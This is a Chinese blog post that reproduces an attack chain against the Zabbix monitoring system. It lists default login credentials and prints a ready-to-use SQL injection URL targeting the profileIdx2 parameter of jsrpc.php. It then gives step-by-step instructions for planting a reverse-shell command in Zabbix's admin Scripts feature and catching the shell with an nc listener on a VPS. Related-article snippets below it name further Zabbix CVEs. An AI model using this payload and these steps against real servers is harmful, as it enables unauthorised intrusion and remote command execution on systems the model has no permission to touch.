Zabbix 注入到命令执行漏洞复现

最新推荐文章于 2024-06-23 18:11:16 发布
最新推荐文章于 2024-06-23 18:11:16 发布
阅读量1.2k 收藏 2
点赞数 1
文章标签: 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/105926971
版权

@Adminxe

Zabbix 站点进行测试,

zabbix常用弱口令  admin / zabbix  或者  guest 空口令

外面注入exp  http://0.0.0.0/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

注入漏洞参数:profileIdx2 ,可以用sqlmap 尝试跑注入

—————————————————————————————————————

利用口令登陆以后开始反弹shell

管理—脚本,在命令写入反弹shell命令,在VPS开始nc监听

 

监测—问题,随便打开个主机找到刚刚创建的脚本,就可以执行反弹shell命令

 

VPS监听反弹shell

 

如果在 脚本命令里面输入  whoami   在 监测—问题,随便选择主机,找到自己whoami的脚本,直接返回用户信息。

 

转载请注明:Adminxe's Blog » Zabbix 注入到命令执行漏洞复现

Adminxe
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Zabbix漏洞
weixin_44237647的博客
11-20 1225
搜索方法:inurl:Zabbix/dashboard.php 漏洞说明: zabbix的某处存在报错注入,也可以使用sqlmap对报错点进行注入 报错点是profileIdx2= 发现用户名不是name字段,而是alias字段。与网上流传的exp的有所不同。 脚本参照前辈: 独自等待 https://www.waitalone.cn/ 更改为python3版本 import requests import os import sys import re def checkSql(): payloa
请注意!Zabbix高危SQL注入漏洞分析
weixin_34395205的博客
10-18 472
0x01 漏洞概述zabbix是一个开源的企业级性能监控解决方案。近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,***者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 但是无需登录注入这里有个前提,就是zabbix开启了guest权限。而在zabbix中,guest的默认密码为空。...
漏洞盒子/Zabbix SQL注入漏洞分析_小白白帽子教程
最新发布
2401_84915584的博客
06-23 166
zabbix sql注入漏洞爆出来已有好几天了,最近忙于安全盒子用户中心的设计,一直没有去研究这个注入,今天早起,闲暇时间写下该文。
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
做自己喜欢的事,并将其发挥到极致!
06-30 1354
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。...
zabbix latest.php SQL注入漏洞(CVE-2016-10134)
菜鸟耿耿
10-07 1477
zabbix latest.php SQL注入漏洞(CVE-2016-10134) zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 一.环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix服务器的操作系统权限。 攻击机IP:192.168.35.128 靶机IP: 192.168.35.1
Zabbix注入漏洞复现
qq_43590351的博客
08-31 1478
CVE-2016-10134
zabbix漏洞利用 Zabbix Server远程代码执行漏洞CVE-2017-2824 2.4.X均受影响
weixin_33849215的博客
09-01 1337
近日,Zabbix Server 2.4.X的trapper命令功能中被曝出存在可利用的代码执行漏洞(CVE-2017-2824)。 一组特制的数据包可能导致命令注入,导致远程执行代码。 攻击者可以从活动的Zabbix Proxy发出请求以触发此漏洞。该漏洞位于Zabbix代码的“Trapper”部分,这是允许代理和服务器通信的网络服务(TCP端口100...
Zabbix远程执行命令的示例详解
09-29
其中,Zabbix远程执行命令功能允许管理员在触发特定事件时,自动在被监控的主机上执行预定义的命令,这对于自动化运维和问题快速响应具有重要意义。 在配置Zabbix远程执行命令之前,我们需要了解一些关键点: 1. *...
zabbix执行远程主机的脚本或指令详解
01-09
为了使Zabbix Agent允许执行远程命令,我们需要编辑Zabbix Agent的配置文件,将`EnableRemoteCommands`参数从默认的0改为1,然后重启Zabbix Agent服务以应用更改。这样,Zabbix Server就能通过Web界面触发在远程主机...
zabbix注入利用工具
01-03
zabbix注入利用工具,超级好用了,常用的安全测试工具
请求zabbix_【更新】Zabbix 远程代码执行漏洞(CVE202011800)
weixin_36251052的博客
01-16 380
漏洞名称 :Zabbix 远程代码执行漏洞CVE-2020-11800威胁等级 : 高危影响范围: Zabbix 2.2.18 -2.2.23Zabbix 3.0 -3.0.30 Zabbix3.2-3.2.11漏洞类型 :远程代码执行利用难度 : 高 漏洞分析 1组件介绍Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级...
zabbix漏洞总结
qq_45300786的博客
03-10 1726
github 维梓梓 https://blog.csdn.net/weixin_43571641/article/details/108317554 https://www.jianshu.com/p/43d86d7ed3a5 https://www.cnblogs.com/itworks/p/7159477.html https://www.cnblogs.com/echoonly/p/15210051.html https://blog.csdn.net/qq_43645782/article/deta
震惊——某白帽破解zabbix系统,实现命令执行,最终获取shell
自强不息
05-19 1829
如果你坚持了自己的梦想,全世界都会为你让路。
zabbix远程命令执行
weixin_41581795的博客
12-12 657
Zabbix 新增两个漏洞 CISA 已知被利用漏洞列表中,新增两个 Zabbix 漏洞
weixin_45735613的博客
02-28 242
关键词 CISA、zabbix安全漏洞 CISA 命令所有联邦民事行政部门机构 (FCEB) 在2022 年 3 月 8 日之前,解决这两个Zabbix 漏洞。 Security Affairs 资讯网站披露,美国网络安全基础设施和安全局(CISA) 在其已知被利用漏洞目录中,新增了两个 Zabbix 漏洞。据悉,漏洞会影响 Zabbix 基础设施监控工具。 漏洞详情如下表: 根据具有约束力的操作指令(BOD) 22-01要求:为了降低已知被利用漏洞的重大风...
CISA:攻击者正在利用开源Zabbix服务器中的多个漏洞
smellycat000的专栏
02-25 509
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士美国网络安全基础设施和安全局 (CISA) 警告称威胁者正在利用开源的Zabbix 工具(用于监控网络、服务器、虚拟机和云服务)中的两个...
软件漏洞Zabbix
qq_45883910的博客
02-12 4142
Zabbix 是什么? 免费的、企业级的分布式开源、C/S架构、监控众多网络参数和服务器的软件。 Zabbix基本原理 存在的漏洞Zabbix Server trapper命令注入漏洞(CVE-2020-11800) zabbix latest.php SQL注入漏洞(CVE-2016-10134) 漏洞原理。 Zabbix Server trapper命令注入漏洞(CVE-2020-11800) :在CVE-2017-2824中,其Server端 trapper command 功能存在一处代
"Zabbix_get命令详解及应用案例
Zabbix_get是Zabbix服务端的命令,能够很方便地知道KEY是否能正常获取到Agent的数据。 为了使用Zabbix_get命令,需要注意以下几个参数的使用: - -s: 指定客户端的主机名或IP。 - -p: 指定客户端的端口,默认为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值